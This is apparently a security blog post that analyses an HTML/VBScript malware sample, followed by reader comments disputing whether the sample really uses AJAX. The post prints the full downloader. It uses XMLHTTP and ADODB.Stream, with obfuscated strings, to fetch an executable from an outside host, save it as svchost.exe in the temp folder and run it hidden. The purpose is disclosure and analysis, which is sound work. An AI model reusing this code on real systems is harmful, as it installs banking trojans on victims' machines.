Malware utilizes AJAX to install itself

One of our customers have brought this HTML based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language="VBScript"]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(“object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")

a1=”Ado”
a2=”db.”
a3=”Str”
a4=”eam”
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,”")
S.type = 1

‘ xml ajax req
str6=”GET”
x.Open str6, dl, False
x.Send

‘ Get temp directory and create our destination name
fname1=”svchost.exe”
set F = df.createobject(“Scripting.FileSystemObject”,”")
set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder
fname1= F.BuildPath(tmp,fname1)
S.open
‘ open adodb stream and write contents of request to file
‘ like vbs dl+exec code
S.write x.responseBody
‘ Saves it with CreateOverwrite flag
S.savetofile fname1,2

S.close
set Q = df.createobject(“Shell.Application”,”")
Q.ShellExecute fname1,”",”",”open”,0
[/script]
[head]
[title][BL4CK] || 404 Not Found[/title]
[/head][body]
[center]
[!-- [script]location.href=’http://google.com’[/script] –]
[/body]
[/html]
As can be seen the malware utilizes AJAX to download http:// grupo-arroba.by.ru/ grupo.exe, which is a malware categorized as W32/new-malware!Maximus, which in turn then downloads http:// www.grupo-arroba.by.ru/ grupo.gif , which is another malware categorized as Win32/Bancos.Variant!Trojan.

This doesn’t look like it is exploiting a new vulnerability in Internet Explorer, rather it uses AJAX to make the downloading and installation of the malware a bit more covert.

Share
  • http://deleted XML Exploit

    AJAX rux!

  • http://hype-free.blogspot.com/2006/11/hips-just-pretty-ui.html Cd-MaN

    No hype please! The code you published has the same amount to do with ajax as any other script, in other words: nothing!

    The particular thing “exploited” (in fact this isn’t an exploit but a configuration problem) is the fact that the user has a misconfigured Internet Zone in IE (probably from a previous infection) which gives the page enough right to write to the disk and execute it.

  • KJK::Hyperion

    WELCOME TO TEH INTERNETS!!! this was actively exploited by phishers at least as early as March. Basically the only thing that changes is which faulty ActiveX control is being exploited to create instances of WScript.Shell and ADODB.Stream. A 99.9% bogus list of such controls is used in metasploit, see

  • http://www.BeyondSecurity.com noam

    Just to calm the waters, no HYPE was intended, it was simply state that AJAX was being used. Why AJAX is new, at least for us, is the fact that AJAX used to download the malware makes ordinary JavaScript scanner/AV work harder :)

  • http://hype-free.blogspot.com/ Cd-MaN

    This is not AJAX! AJAX is Asynchronous JavaScript and XML. The only thing this has in common with any AJAX site is the fact that it creates an XMLHttpRequest object. Thats all. KJK::Hyperion is 100% right that this is almost the same as the ADODB.Stream exploits, only the download methodology changed a little. Why weren’t those labeled “AJAX” exploits? Because they weren’t!

    Please look at the Wikipedia article which describes AJAX (http://en.wikipedia.org/wiki/AJAX). Out of the 4 signs of it (found at the beginning at the article after the “The Ajax technique uses a combination of” text) this exploit satisfies only one. It is not AJAX!

    Thank you.

  • http://deleted XML Exploit

    not AJAX :(

  • http://x-solve.com/blog/?author=19 Kuon

    Not only malware installation but also 0day browser sploits:)

  • http://xmlexploit.com XML Exploit

    AJAX AJAX!, ok just XML :) wait… not even an XML… just plain downloading and executing :)

    Don’t blame the expert, he just posted information he got, did a quick analysis. Bashing doesn’t help!

  • sunshine

    I see it more as a cynical post. Still, even if it wasn;t, it’s sharing data and I am very happy that our user community is here to attack and critisize it, reaching better conclusions.
    That’s what security is all about.

  • LiFe

    Hello,
    My website is influenced with this Malware : ADODB.Stream exploits, and each index.html I uploaded I found this malware is provided inside index.htm. So, how to eliminate this one?